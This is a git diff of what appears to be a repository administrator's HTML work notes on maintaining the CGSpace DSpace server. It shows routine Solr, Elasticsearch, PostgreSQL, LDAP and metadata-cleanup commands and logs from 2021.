                                                                                                                                                                                                            -Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
                                                                                                                                                                                                            -Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
                                                                                                                                                                                                            -Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
                                                                                                                                                                                                            -Run 1 took 5m 53s
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -**************************
                                                                                                                                                                                                            -* Update Script Finished *
                                                                                                                                                                                                            -**************************
                                                                                                                                                                                                            -
                                                                                                                                                                                                              +
                                                                                                                                                                                                              $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12
                                                                                                                                                                                                              +Loading @mire database changes for module MQM
                                                                                                                                                                                                              +Changes have been processed
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +*************************
                                                                                                                                                                                                              +* Update Script Started *
                                                                                                                                                                                                              +*************************
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +Run 1
                                                                                                                                                                                                              +Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                              +Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                              +Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                              +Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
                                                                                                                                                                                                              +Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
                                                                                                                                                                                                              +Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
                                                                                                                                                                                                              +Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
                                                                                                                                                                                                              +Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
                                                                                                                                                                                                              +Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
                                                                                                                                                                                                              +Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
                                                                                                                                                                                                              +Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
                                                                                                                                                                                                              +Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
                                                                                                                                                                                                              +Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
                                                                                                                                                                                                              +Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
                                                                                                                                                                                                              +Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
                                                                                                                                                                                                              +Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
                                                                                                                                                                                                              +Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
                                                                                                                                                                                                              +Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
                                                                                                                                                                                                              +Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
                                                                                                                                                                                                              +Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
                                                                                                                                                                                                              +Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
                                                                                                                                                                                                              +Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
                                                                                                                                                                                                              +Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
                                                                                                                                                                                                              +Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
                                                                                                                                                                                                              +Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
                                                                                                                                                                                                              +Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
                                                                                                                                                                                                              +Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
                                                                                                                                                                                                              +Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
                                                                                                                                                                                                              +Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
                                                                                                                                                                                                              +Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
                                                                                                                                                                                                              +Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
                                                                                                                                                                                                              +Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
                                                                                                                                                                                                              +Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
                                                                                                                                                                                                              +Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
                                                                                                                                                                                                              +Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
                                                                                                                                                                                                              +Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
                                                                                                                                                                                                              +Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
                                                                                                                                                                                                              +Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
                                                                                                                                                                                                              +Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
                                                                                                                                                                                                              +Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
                                                                                                                                                                                                              +Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
                                                                                                                                                                                                              +Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
                                                                                                                                                                                                              +Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
                                                                                                                                                                                                              +Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
                                                                                                                                                                                                              +Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
                                                                                                                                                                                                              +Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
                                                                                                                                                                                                              +Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
                                                                                                                                                                                                              +Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
                                                                                                                                                                                                              +Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
                                                                                                                                                                                                              +Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
                                                                                                                                                                                                              +Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
                                                                                                                                                                                                              +Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
                                                                                                                                                                                                              +Run 1 took 5m 53s
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +**************************
                                                                                                                                                                                                              +* Update Script Finished *
                                                                                                                                                                                                              +**************************
                                                                                                                                                                                                              +
                                                                                                                                                                                                              -
                                                                                                                                                                                                              2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&wt=javabin&version=2} hits=143 status=0 QTime=0
                                                                                                                                                                                                              -
                                                                                                                                                                                                                +
                                                                                                                                                                                                                2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&wt=javabin&version=2} hits=143 status=0 QTime=0
                                                                                                                                                                                                                +
                                                                                                                                                                                                                • But the item mapper only displays ten items, with no pagination
                                                                                                                                                                                                                  • There is no way to search by handle or ID
                                                                                                                                                                                                                  • @@ -836,18 +836,18 @@ Run 1 took 5m 53s
                                                                                                                                                                                                                -
                                                                                                                                                                                                                import requests
                                                                                                                                                                                                                -
                                                                                                                                                                                                                -query_params = {'item-type': 'publication', 'format': 'Json', 'limit': 10, 'offset': 0, 'api-key': 'blahhhahahah', 'filter': '[["issn","equals","0011-183X"]]'}
                                                                                                                                                                                                                -r = requests.get('https://v2.sherpa.ac.uk/cgi/retrieve')
                                                                                                                                                                                                                -if r.status_code and len(r.json()['items']) > 0:
                                                                                                                                                                                                                -    r.json()['items'][0]['title'][0]['title']
                                                                                                                                                                                                                -
                                                                                                                                                                                                                  +
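import requests
+
+# Query the Sherpa v2 API for a publication by ISSN
+query_params = {'item-type': 'publication', 'format': 'Json', 'limit': 10, 'offset': 0, 'api-key': 'blahhhahahah', 'filter': '[["issn","equals","0011-183X"]]'}
+# The parameters must be passed explicitly, otherwise the request is sent without them
+r = requests.get('https://v2.sherpa.ac.uk/cgi/retrieve', params=query_params)
+if r.status_code == 200 and len(r.json()['items']) > 0:
+    print(r.json()['items'][0]['title'][0]['title'])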
                                                                                                                                                                                                                  +
                                                                                                                                                                                                                  • I exported a list of all our ISSNs from CGSpace:
                                                                                                                                                                                                                  -
                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
                                                                                                                                                                                                                  -COPY 3081
                                                                                                                                                                                                                  -
                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
                                                                                                                                                                                                                    +COPY 3081
                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    • I wrote a script to check the ISSNs against Crossref’s API: crossref-issn-lookup.py
                                                                                                                                                                                                                      • I suspect Crossref might have better data actually…
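For reference, a minimal sketch of what an ISSN lookup against Crossref could look like. This is not the `crossref-issn-lookup.py` script itself: the function names are hypothetical, and it assumes the public `https://api.crossref.org/journals/{issn}` route, which returns a JSON document with the journal record under `message`.

```python
import json
import urllib.error
import urllib.request
from typing import Optional
from urllib.parse import quote

# Assumed endpoint: Crossref's public journals route
CROSSREF_JOURNALS = "https://api.crossref.org/journals/"


def journal_url(issn: str) -> str:
    """Build the lookup URL for one ISSN (hypothetical helper)."""
    return CROSSREF_JOURNALS + quote(issn.strip())


def journal_title(payload: dict) -> Optional[str]:
    """Pull the journal title out of a decoded Crossref response."""
    if payload.get("status") != "ok":
        return None
    return payload.get("message", {}).get("title")


def lookup(issn: str) -> Optional[str]:
    """Fetch one ISSN from Crossref; returns None on an HTTP error."""
    try:
        with urllib.request.urlopen(journal_url(issn), timeout=30) as resp:
            return journal_title(json.load(resp))
    except urllib.error.HTTPError:
        return None
```

Calling `lookup()` on each line of the exported ISSN list would give a title (or `None`) per ISSN, which can then be compared with the Sherpa results.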
diff --git a/docs/2021-04/index.html b/docs/2021-04/index.html
index 1c94c886c..a1ee7c1f8 100644
--- a/docs/2021-04/index.html
+++ b/docs/2021-04/index.html
@@ -44,7 +44,7 @@ Perhaps one of the containers crashed, I should have looked closer but I was in
"/>
-
+
@@ -153,21 +153,21 @@ Perhaps one of the containers crashed, I should have looked closer but I was in
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-account" -W "(sAMAccountName=otheraccounttoquery)"
                                                                                                                                                                                                                    -

                                                                                                                                                                                                                    2021-04-04

                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-account" -W "(sAMAccountName=otheraccounttoquery)"
                                                                                                                                                                                                                    +

                                                                                                                                                                                                                    2021-04-04

                                                                                                                                                                                                                    • Check the index aliases on AReS Explorer to make sure they are sane before starting a new harvest:
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                      +
                                                                                                                                                                                                                      $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                                                      +
                                                                                                                                                                                                                      • Then set the openrxv-items-final index to read-only so we can make a backup:
                                                                                                                                                                                                                      -
                                                                                                                                                                                                                      $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}' 
                                                                                                                                                                                                                      -{"acknowledged":true}%
                                                                                                                                                                                                                      -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
                                                                                                                                                                                                                      -{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final-backup"}%
                                                                                                                                                                                                                      -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                      -
                                                                                                                                                                                                                        +
                                                                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}' 
                                                                                                                                                                                                                        +{"acknowledged":true}%
                                                                                                                                                                                                                        +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
                                                                                                                                                                                                                        +{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final-backup"}%
                                                                                                                                                                                                                        +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                        +
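The backup sequence above (block writes, clone, unblock writes) could be scripted. The following is only a sketch: `backup_steps` is a hypothetical helper that builds the three requests in order and leaves sending them to whichever HTTP client is at hand. The endpoints and bodies are the same ones used in the curl commands.

```python
import json


def backup_steps(index, backup, base_url="http://localhost:9200"):
    """Return the (method, url, body) requests for a clone-based backup."""

    def settings_step(read_only):
        # Same body as the curl commands: toggle the index write block
        body = json.dumps({"settings": {"index.blocks.write": read_only}})
        return ("PUT", f"{base_url}/{index}/_settings", body)

    return [
        settings_step(True),  # the clone API needs a write-blocked source
        ("POST", f"{base_url}/{index}/_clone/{backup}", None),
        settings_step(False),  # make the index writable again
    ]


for method, url, body in backup_steps("openrxv-items-final", "openrxv-items-final-backup"):
    print(method, url, body or "")
```

Keeping the steps in one list makes it harder to forget the last one, which would leave the index read-only during the next harvest.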
• Then start a harvest on AReS Explorer
                                                                                                                                                                                                                        • Help Enrico get some 2020 statistics for the Roots, Tubers and Bananas (RTB) community on CGSpace
                                                                                                                                                                                                                            @@ -181,8 +181,8 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                                                                        -
                                                                                                                                                                                                                        $ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p 'fuuu' -f cg.issn -t 'correct' -m 253
                                                                                                                                                                                                                        -
                                                                                                                                                                                                                          +
                                                                                                                                                                                                                          $ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p 'fuuu' -f cg.issn -t 'correct' -m 253
                                                                                                                                                                                                                          +
• For now I only fixed obvious errors like “1234-5678.”, “e-ISSN: 1234-5678”, etc., but there are still lots of invalid ones that need more manual work:
                                                                                                                                                                                                                            • Too few characters
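A rough sketch of how the remaining ISSNs could be triaged automatically. The helper names are hypothetical. `normalize_issn` handles the "obvious" cases mentioned above (stray prefixes and trailing punctuation), and `has_valid_check_digit` applies the standard ISSN check digit rule: weights 8 down to 2 on the first seven digits, modulo 11, with `X` standing for 10.

```python
import re
from typing import Optional

# Four digits, a hyphen, three digits, then a digit or X as check character
ISSN_PATTERN = re.compile(r"\b(\d{4})-(\d{3})([\dXx])\b")


def normalize_issn(value: str) -> Optional[str]:
    """Extract a well-formed ISSN from a messy value, or None if absent."""
    match = ISSN_PATTERN.search(value)
    if match is None:
        return None
    return f"{match.group(1)}-{match.group(2)}{match.group(3).upper()}"


def has_valid_check_digit(issn: str) -> bool:
    """Verify the final character against the ISSN check digit rule."""
    digits = issn.replace("-", "")
    if len(digits) != 8 or not digits[:7].isdigit():
        return False
    # Weights 8, 7, ..., 2 applied to the first seven digits
    total = sum(int(d) * w for d, w in zip(digits[:7], range(8, 1, -1)))
    expected = (11 - total % 11) % 11
    expected_char = "X" if expected == 10 else str(expected)
    return digits[7].upper() == expected_char
```

Values where `normalize_issn` returns `None` (too few characters, for example) still need manual work. Values that normalize but fail the check digit are probably typos.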
                                                                                                                                                                                                                            • @@ -196,19 +196,19 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
• The AReS Explorer harvest from yesterday finished and the results look OK, but the Elasticsearch indexes are messed up again:
                                                                                                                                                                                                                              -
                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                              -    "openrxv-items-final": {
                                                                                                                                                                                                                              -        "aliases": {}
                                                                                                                                                                                                                              -    },
                                                                                                                                                                                                                              -    "openrxv-items-temp": {
                                                                                                                                                                                                                              -        "aliases": {
                                                                                                                                                                                                                              -            "openrxv-items": {}
                                                                                                                                                                                                                              -        }
                                                                                                                                                                                                                              -    },
                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                +    "openrxv-items-final": {
                                                                                                                                                                                                                                +        "aliases": {}
                                                                                                                                                                                                                                +    },
                                                                                                                                                                                                                                +    "openrxv-items-temp": {
                                                                                                                                                                                                                                +        "aliases": {
                                                                                                                                                                                                                                +            "openrxv-items": {}
                                                                                                                                                                                                                                +        }
                                                                                                                                                                                                                                +    },
                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                +
• openrxv-items should be an alias of openrxv-items-final, not openrxv-items-temp… I will have to fix that manually
                                                                                                                                                                                                                                • Enrico asked for more information on the RTB stats I gave him yesterday
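Regarding the misplaced `openrxv-items` alias noted above, here is a sketch of how the manual fix could be derived from the `_alias` output. The helper names are hypothetical. The resulting body follows Elasticsearch's `POST /_aliases` API with `remove` and `add` actions, which are applied atomically.

```python
def alias_holders(alias_response, alias):
    """List the indexes that currently carry the given alias."""
    return sorted(
        index
        for index, info in alias_response.items()
        if alias in info.get("aliases", {})
    )


def build_alias_fix(alias_response, alias, wanted_index):
    """Build a POST /_aliases body that moves the alias to wanted_index."""
    holders = alias_holders(alias_response, alias)
    actions = [
        {"remove": {"index": index, "alias": alias}}
        for index in holders
        if index != wanted_index
    ]
    if wanted_index not in holders:
        actions.append({"add": {"index": wanted_index, "alias": alias}})
    return {"actions": actions}


# The broken state shown in the curl output above
current = {
    "openrxv-items-final": {"aliases": {}},
    "openrxv-items-temp": {"aliases": {"openrxv-items": {}}},
}
print(build_alias_fix(current, "openrxv-items", "openrxv-items-final"))
```

An empty `actions` list means the aliases are already sane, so the same check could run before starting each harvest.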
                                                                                                                                                                                                                                    @@ -218,16 +218,16 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                $ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
                                                                                                                                                                                                                                -$ csvcut -c 'id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]' /tmp/rtb.csv | \
                                                                                                                                                                                                                                -  sed '1d' | \
                                                                                                                                                                                                                                -  csvsql --no-header --no-inference --query 'SELECT a AS id,COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, "") AS issued FROM stdin' | \
                                                                                                                                                                                                                                -  csvgrep -c issued -m 2020 | \
                                                                                                                                                                                                                                -  csvcut -c id | \
                                                                                                                                                                                                                                -  sed '1d' | \
                                                                                                                                                                                                                                -  sort | \
                                                                                                                                                                                                                                -  uniq
                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                  $ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
                                                                                                                                                                                                                                  +$ csvcut -c 'id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]' /tmp/rtb.csv | \
                                                                                                                                                                                                                                  +  sed '1d' | \
                                                                                                                                                                                                                                  +  csvsql --no-header --no-inference --query 'SELECT a AS id,COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, "") AS issued FROM stdin' | \
                                                                                                                                                                                                                                  +  csvgrep -c issued -m 2020 | \
                                                                                                                                                                                                                                  +  csvcut -c id | \
                                                                                                                                                                                                                                  +  sed '1d' | \
                                                                                                                                                                                                                                  +  sort | \
                                                                                                                                                                                                                                  +  uniq
                                                                                                                                                                                                                                  +
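For comparison, the same filtering can be sketched in plain Python with only the standard library. This is an illustrative equivalent of the csvkit pipeline above, not the method used in these notes; the function name `ids_issued_in` and the sample rows are hypothetical, and only the column names come from the `csvcut` call.

```python
import csv
import io

# The three variants of the date issued column named in the csvcut call
ISSUED_COLUMNS = ["dcterms.issued", "dcterms.issued[]", "dcterms.issued[en_US]"]


def ids_issued_in(csv_file, year):
    """Return the sorted, unique ids whose combined issue date contains `year`."""
    ids = set()
    for row in csv.DictReader(csv_file):
        # Concatenate the variants, treating missing or empty cells as ""
        # (the same idea as COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, ""))
        issued = "".join(row.get(column) or "" for column in ISSUED_COLUMNS)
        # Substring match, like `csvgrep -m`
        if year in issued:
            ids.add(row["id"])
    return sorted(ids)


# Hypothetical sample standing in for /tmp/rtb.csv
sample = io.StringIO(
    "id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US],dc.title\n"
    "b2,2020-05,,,Item B\n"
    "a1,,,2020,Item A\n"
    "c3,2019-11,,,Item C\n"
    "a1,,,2020,Item A again\n"
)
print(ids_issued_in(sample, "2020"))
```

With a real export, the `io.StringIO` sample would be replaced by `open("/tmp/rtb.csv", newline="")`.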
                                                                                                                                                                                                                                  • So I remember in the future, this basically does the following:
                                                                                                                                                                                                                                    • Use csvcut to extract the id and all date issued columns from the CSV
                                                                                                                                                                                                                                    • @@ -242,32 +242,32 @@ $ csvcut -c 'id,dcterms.issued,dcterms.issued[],
                                                                                                                                                                                                                                    • Then I have a list of 296 IDs for RTB items issued in 2020
                                                                                                                                                                                                                                    • I constructed a JSON file to post to the DSpace Statistics API:
                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                    -  "limit": 100,
                                                                                                                                                                                                                                    -  "page": 0,
                                                                                                                                                                                                                                    -  "dateFrom": "2020-01-01T00:00:00Z",
                                                                                                                                                                                                                                    -  "dateTo": "2020-12-31T00:00:00Z",
                                                                                                                                                                                                                                    -  "items": [
                                                                                                                                                                                                                                    -"00358715-b70c-4fdd-aa55-730e05ba739e",
                                                                                                                                                                                                                                    -"004b54bb-f16f-4cec-9fbc-ab6c6345c43d",
                                                                                                                                                                                                                                    -"02fb7630-d71a-449e-b65d-32b4ea7d6904",
                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                    -  ]
                                                                                                                                                                                                                                    -}
                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                      +  "limit": 100,
                                                                                                                                                                                                                                      +  "page": 0,
                                                                                                                                                                                                                                      +  "dateFrom": "2020-01-01T00:00:00Z",
                                                                                                                                                                                                                                      +  "dateTo": "2020-12-31T00:00:00Z",
                                                                                                                                                                                                                                      +  "items": [
                                                                                                                                                                                                                                      +"00358715-b70c-4fdd-aa55-730e05ba739e",
                                                                                                                                                                                                                                      +"004b54bb-f16f-4cec-9fbc-ab6c6345c43d",
                                                                                                                                                                                                                                      +"02fb7630-d71a-449e-b65d-32b4ea7d6904",
                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                      +  ]
                                                                                                                                                                                                                                      +}
                                                                                                                                                                                                                                      +
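A minimal sketch of generating one request body per page, instead of editing the `page` value by hand. The field names are taken from the JSON above; the helper name `build_payloads` and the placeholder IDs are hypothetical, and the sketch assumes every page sends the same full `items` list with only `page` changing.

```python
import json


def build_payloads(item_ids, date_from, date_to, limit=100):
    """Build one request body per page for a list of item IDs."""
    # Ceiling division: 296 IDs at 100 per page gives 3 pages
    total_pages = (len(item_ids) + limit - 1) // limit
    return [
        {
            "limit": limit,
            "page": page,
            "dateFrom": date_from,
            "dateTo": date_to,
            "items": list(item_ids),
        }
        for page in range(total_pages)
    ]


# Placeholder IDs for illustration only; real ones come from the CSV export
item_ids = [f"item-{n}" for n in range(296)]
payloads = build_payloads(item_ids, "2020-01-01T00:00:00Z", "2020-12-31T00:00:00Z")

for payload in payloads:
    # Each body could be written to a file and posted with curl -d @file
    body = json.dumps(payload)
    print(payload["page"], len(payload["items"]), len(body) > 0)
```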
                                                                                                                                                                                                                                      • Then I submitted the file three times (changing the page parameter):
                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                      $ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page1.json
                                                                                                                                                                                                                                      -$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page2.json
                                                                                                                                                                                                                                      -$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page3.json
                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                        $ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page1.json
                                                                                                                                                                                                                                        +$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page2.json
                                                                                                                                                                                                                                        +$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page3.json
                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                        • Then I extracted the views and downloads in the most ridiculous way:
                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                        $ grep views /tmp/page*.json | grep -o -E '[0-9]+$' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                        -30364
                                                                                                                                                                                                                                        -$ grep downloads /tmp/page*.json | grep -o -E '[0-9]+,' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                        -9100
                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                          $ grep views /tmp/page*.json | grep -o -E '[0-9]+$' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                          +30364
                                                                                                                                                                                                                                          +$ grep downloads /tmp/page*.json | grep -o -E '[0-9]+,' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
                                                                                                                                                                                                                                          +9100
                                                                                                                                                                                                                                          +
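A less fragile alternative to the grep and bc pipeline is to parse the JSON and add up the counts. The sketch below assumes each saved page holds a `statistics` array whose entries carry integer `views` and `downloads` fields; that layout is an assumption, so check it against the real `/tmp/page*.json` files first. The function names and sample numbers are made up for illustration.

```python
import glob
import json


def sum_statistics(pages):
    """Sum views and downloads across a list of parsed response pages."""
    views = downloads = 0
    for page in pages:
        # "statistics" is the assumed name of the per-item array
        for item in page.get("statistics", []):
            views += item.get("views", 0)
            downloads += item.get("downloads", 0)
    return views, downloads


def load_pages(pattern):
    """Parse every JSON file matching a glob pattern."""
    pages = []
    for path in sorted(glob.glob(pattern)):
        with open(path) as handle:
            pages.append(json.load(handle))
    return pages


# Made-up sample data, not real CGSpace statistics
sample_pages = [
    {"statistics": [{"id": "a", "views": 10, "downloads": 2}]},
    {"statistics": [{"id": "b", "views": 5, "downloads": 1},
                    {"id": "c", "views": 0, "downloads": 4}]},
]
print(sum_statistics(sample_pages))
```

For the real files, the call would be `sum_statistics(load_pages("/tmp/page*.json"))`.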
                                                                                                                                                                                                                                          • For curiousity I did the same exercise for items issued in 2019 and got the following:
                                                                                                                                                                                                                                            • Views: 30721
                                                                                                                                                                                                                                            • @@ -290,17 +290,17 @@ $ grep downloads /tmp/page*.json | grep -o -E '[
                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                          $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                          -12413
                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                            $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                            +12413
                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                            • The system journal shows thousands of these messages in the system journal, this is the first one:
                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                            Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                              +
